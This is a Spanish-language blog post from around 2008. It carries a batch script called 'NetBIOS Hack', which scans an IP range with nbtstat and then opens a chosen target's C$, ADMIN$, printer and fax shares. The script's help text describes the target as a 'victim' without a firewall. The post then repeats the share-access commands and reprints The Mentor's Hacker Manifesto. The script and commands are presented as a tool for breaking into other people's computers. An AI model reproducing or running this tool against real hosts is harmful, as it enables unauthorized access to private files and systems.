echo º 1 º º Escanear un rango IP º º 2 º º Analizar una sola IP º
echo ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼ ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º 3 º º Mas informacion º º 4 º º Salir º
echo ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼ ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
set /p opc="Opcion> "
if %opc%==1 goto erip
if %opc%==2 goto aip
if %opc%==3 goto mi
if %opc%==4 goto s
if %opc%==%opc% goto e0
:e0
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Opcion incorrecta º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Presione cualquier tecla para volver al menu º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
pause>nul
goto menu
:erip
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Se analizaran como maximo 255 direcciones IP º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Introduzca los cuatro campos º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
set /p c1="Campo 1> "
set /p c2="Campo 2> "
set /p c3="Campo 3> "
set /p c4="Campo 4> "
set /a cmp4=%c4%
if %c1% GTR 255 (goto IPerr) else (goto an)
if %c2% GTR 255 (goto IPerr) else (goto an)
if %c3% GTR 255 (goto IPerr) else (goto an)
if %c4% GTR 255 (goto IPerr) else (goto an)
:an
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Analizando... º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Las siguientes direcciones IP poseen NetBIOS activado º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
:scan
set /a cmp4=%cmp4%+1
if %cmp4% GTR 255 goto acc else (
nbtstat -A %c1%.%c2%.%c3%.%cmp4%>IP.txt
for %%a in (20) do call :anlz %%a
:anlz
echo.|find "%1"nul
if %errorlevel%==1 echo create>nspe.txt
if exist nspe.txt (goto nspe) else (goto spe)
:spe
echo %c1%.%c2%.%c3%.%cmp4%
del /f /q IP.txt>nul
goto scan
:nspe
del /f /q nspe.txt>nul
goto scan
)
:acc
del /f /q IP.txt>nul
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Analisis finalizado º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Introduzca una direccion IP de la lista para acceder º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
set /p IP="Direccion IP> "
goto mod
:mod
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Menu de acceso via NetBIOS - Elija una opcion º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º 1 º º Disco duro º º 2 º º Carpeta WINDOWS º
echo ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼ ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º 3 º º Carpetas compartidas º º 4 º º Impresora º
echo ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼ ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º 5 º º Fax º º 6 º º Ver que comparte º
echo ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼ ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍ» ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º 7 º º Volver al menu º
echo ÈÍÍÍ¼ ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
set /p accIP="Modo de Acceso para %IP%> "
if %accIP%==1 goto add
if %accIP%==2 goto acw
if %accIP%==3 goto acm
if %accIP%==4 goto aim
if %accIP%==5 goto afx
if %accIP%==6 goto avc
if %accIP%==7 goto vlr
if %accIP%==%accIP% goto e1
:e1
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Opcion incorrecta º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Presione cualquier tecla para volver º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
pause>nul
goto mod
:add
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Iniciando acceso para disco duro º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
start \\%IP%\C$
goto mod
:acw
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Iniciando acceso para carpeta WINDOWS º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
start \\%IP%\ADMIN$
goto mod
:acm
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Iniciando acceso para carpetas compartidas º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
start \\%IP%
goto mod
:aim
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Iniciando acceso para impresora º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
start \\%IP%\PRINT$
goto mod
:afx
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Iniciando acceso para fax º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
start \\%IP%\FAX$
goto mod
:avc
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Recursos compartios º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
net view \\%IP%
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Presione cualquier tecla para volver º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
pause>nul
goto mod
:vlr
goto menu
:IPerr
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Recuerda que el numero maximo por campo es 255 º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Presione cualquier tecla para volver º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
pause>nul
goto erip
:aip
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Introduce la IP a analizar º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo.
set /p IP="Analizar IP> "
echo.
nbtstat -A %IP%>IP1.txt
for %%a in (20) do call :anlz1 %%a
:anlz1
echo.|find "%1"nul
if %errorlevel%==1 echo create>nspe1.txt
if exist nspe1.txt (goto nspe1) else (goto spe1)
:nspe1
del /s /q /f nspe1.txt>nul
del /s /q /f IP1.txt>nul
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º No se puede acceder a sus recursos compartidos º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Presione cualquier tecla para intentar otra IP º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
pause>nul
goto aip
:spe1
del /s /q /f IP1.txt>nul
goto mod
:s
cls
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Gracias por utilizar NetBIOS Hack by Klez.H º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Dedicado a la comunidad underground º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Presione cualquier tecla para salir º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
pause>nul
exit
:mi
cls
echo.
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Basicamente con este archivo se puede "hackear" ciertas PC's º
echo º Posee dos funciones en su menu, una da la posibilidad de hacerº
echo º un escaneo de hasta 255 direcciones IP en busca de ordenadoresº
echo º con NetBIOS activado y al encontrarlas dar la posibilidad al º
echo º usuario de elegir el modo de acceso para ingresar a otra PC, º
echo º la opcion restante es tecnicamente igual, solo º
echo º que el usuario elige una IP cualquiera para ver si posee el º
echo º acceso y de ser asi podra ingresar. º
echo º Para obtener el acceso definitivo a otro ordenador por medio º
echo º de este archivo se requiere que ambos tengas el S.O. Windows, º
echo º que tengan NetBIOS activado y que la victima no tenga un fire º
echo º wall instalado. º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
echo º Presione cualquier tecla para volver º
echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼
pause>nul
goto menu

Existen Varios Programas como:
Softperfect Network Scanner , Ip tools y Lan Guard
que hacen el mismo trabajo

Ese Batch les Facilita todo el Trabajo pero cuando tengas una ip con netbios conectate a ella con los siguientes comandos:

Ver los Recursos Compartidos:
net view \\%IP%
Acceso a Fax:
start \\%IP%\FAX$
Acceso a Impresora:
start \\%IP%\PRINT$
Carpetas Compartidas:
start \\%IP%
Acceso a Windows:
start \\%IP%\ADMIN$
Acceso a Disco C:
start \\%IP%\C$

Eso es Todo por Ahora ^^ Claro antes de Inicar una Coneccion por NetBIOS activa el Servicio de NetBIOS en tu PC

Rario's Blog

noreply@blogger.com (Rario) — Thu, 16 Oct 2008 00:03:00 +0000

Bienvenidos a Este Nuevo Blog sobre Informatica, como es el Primer post solamente les voy a poner esto: El Manifiesto Hacker - La Conciensia de un Hacker - por +++The Mentor+++

 El Manifiesto Hacker
Another one got caught today, it's all over the papers.  "Teenager
Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
    Damn kids.  They're all alike.

    But did you, in your three-piece psychology and 1950's technobrain,
ever take a look behind the eyes of the hacker?  Did you ever wonder what
made him tick, what forces shaped him, what may have molded him?
    I am a hacker, enter my world...
    Mine is a world that begins with school... I'm smarter than most of
the other kids, this crap they teach us bores me...
    Damn underachiever.  They're all alike.

    I'm in junior high or high school.  I've listened to teachers explain
for the fifteenth time how to reduce a fraction.  I understand it.  "No, Ms.
Smith, I didn't show my work.  I did it in my head..."
    Damn kid.  Probably copied it.  They're all alike.

    I made a discovery today.  I found a computer.  Wait a second, this is
cool.  It does what I want it to.  If it makes a mistake, it's because I
screwed it up.  Not because it doesn't like me...
            Or feels threatened by me...
            Or thinks I'm a smart ass...
            Or doesn't like teaching and shouldn't be here...
    Damn kid.  All he does is play games.  They're all alike.

    And then it happened... a door opened to a world... rushing through
the phone line like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is
found.
    "This is it... this is where I belong..."
    I know everyone here... even if I've never met them, never talked to
them, may never hear from them again... I know you all...
    Damn kid.  Tying up the phone line again.  They're all alike...

    You bet your ass we're all alike... we've been spoon-fed baby food at
school when we hungered for steak... the bits of meat that you did let slip
through were pre-chewed and tasteless.  We've been dominated by sadists, or
ignored by the apathetic.  The few that had something to teach found us will-
ing pupils, but those few are like drops of water in the desert.

    This is our world now... the world of the electron and the switch, the
beauty of the baud.  We make use of a service already existing without paying
for what could be dirt-cheap if it wasn't run by profiteering gluttons, and
you call us criminals.  We explore... and you call us criminals.  We seek
after knowledge... and you call us criminals.  We exist without skin color,
without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us
and try to make us believe it's for our own good, yet we're the criminals.

    Yes, I am a criminal.  My crime is that of curiosity.  My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

    I am a hacker, and this is my manifesto.  You may stop this individual,
but you can't stop us all... after all, we're all alike.

 +++The Mentor+++
Aqui esta el Link a la Version en Español